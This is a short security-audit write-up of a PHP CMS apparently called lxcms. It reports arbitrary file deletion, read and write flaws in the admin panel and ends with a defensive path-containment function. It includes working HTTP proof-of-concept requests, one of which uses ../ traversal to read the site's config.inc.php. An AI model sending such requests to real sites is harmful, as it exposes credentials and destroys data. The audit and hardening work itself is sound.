Now that my Java code auditing is starting to bear fruit and I have a few small 0days under my belt, I'm opening a new chapter: learning PHP code auditing, starting with relatively simple CMSes.
I won't write up the MVC framework analysis; let's go straight to the root causes of the vulnerabilities.
Arbitrary file deletion
The delete method of the FileAction class

Following into the $this->fileModel->delete method

After debugging, arbitrary file deletion is confirmed.

POST /admin.php?m=File&a=delete HTTP/1.1
Host: lxcms:9988
content-type: application/x-www-form-urlencoded
Cookie: PHPSESSID=cd23070c8025b0d4679000e791b2e1e4
accept-language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
cache-control: max-age=0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://lxcms:9988/admin.php?m=File&a=imageMain&type=0
upgrade-insecure-requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Origin: http://lxcms:9988
Content-Length: 155

type=0&delImages=%E5%88%A0%E9%99%A4%E9%80%89%E4%B8%AD%E5%9B%BE%E7%89%87&fid[]={{urlenc(7#####\file\d\product\1.txt)}}
Arbitrary file read

GET /admin.php?m=Template&a=editfile&dir=../inc/config.inc.php HTTP/1.1
Host: lxcms:9988
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Referer: http://lxcms:9988/admin.php?m=Template&a=opendir&dir=123
Cookie: PHPSESSID=cd23070c8025b0d4679000e791b2e1e4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
The dir parameter is not filtered for ../, so this is a straightforward arbitrary file read.

Arbitrary file write

The path in the put function is built by concatenating filename directly,
and put calls file_put_contents, which leads to an arbitrary file write.
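All three issues share one root cause: a user-controlled path fragment (fid[], dir, filename) reaches unlink/file read/file_put_contents without being confined to its intended directory. The following is an added hardening example, not lxcms code; the function name resolveWithinBase and the demo directory layout are my own assumptions. It canonicalises the path with realpath and rejects anything that resolves outside the base, which is the check the delete, editfile and put code paths above are missing.

```php
<?php
// Added hardening example, not lxcms code. Resolves a user-supplied relative
// path (a template name, an image id path, an upload filename) against a fixed
// base directory and refuses anything that lands outside it, so the same check
// can guard the delete, editfile and put code paths discussed above.
function resolveWithinBase(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;                       // the base directory must exist
    }
    // NUL bytes, absolute paths, drive letters and UNC prefixes are never valid here.
    if (strpos($userPath, "\0") !== false
        || preg_match('#^([a-zA-Z]:)?[\\\\/]#', $userPath)) {
        return null;
    }
    $candidate = $baseReal . '/' . str_replace('\\', '/', $userPath);
    $leaf = basename($candidate);
    if ($leaf === '' || $leaf === '.' || $leaf === '..') {
        return null;                       // no directory-level targets
    }
    // The leaf may not exist yet (write case), so canonicalise its parent,
    // which also collapses any ../ segments and follows symlinks.
    $parentReal = realpath(dirname($candidate));
    if ($parentReal === false) {
        return null;
    }
    $resolved = $parentReal . DIRECTORY_SEPARATOR . $leaf;
    // Containment check: the canonical path must begin with base + separator.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

// Constructed demonstration: a throw-away template directory (assumed layout).
$base = sys_get_temp_dir() . '/lxcms_tpl_demo';
@mkdir($base . '/default', 0700, true);
file_put_contents($base . '/default/index.html', '<!-- demo -->');

var_dump(resolveWithinBase($base, 'default/index.html'));     // an ordinary template file
var_dump(resolveWithinBase($base, '../inc/config.inc.php'));  // the dir value from the editfile request
var_dump(resolveWithinBase($base, 'default/../../x.php'));    // nested traversal
```

Only a non-null return value should ever be passed to unlink, file_get_contents or file_put_contents; a null means the request should be rejected and, ideally, logged.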


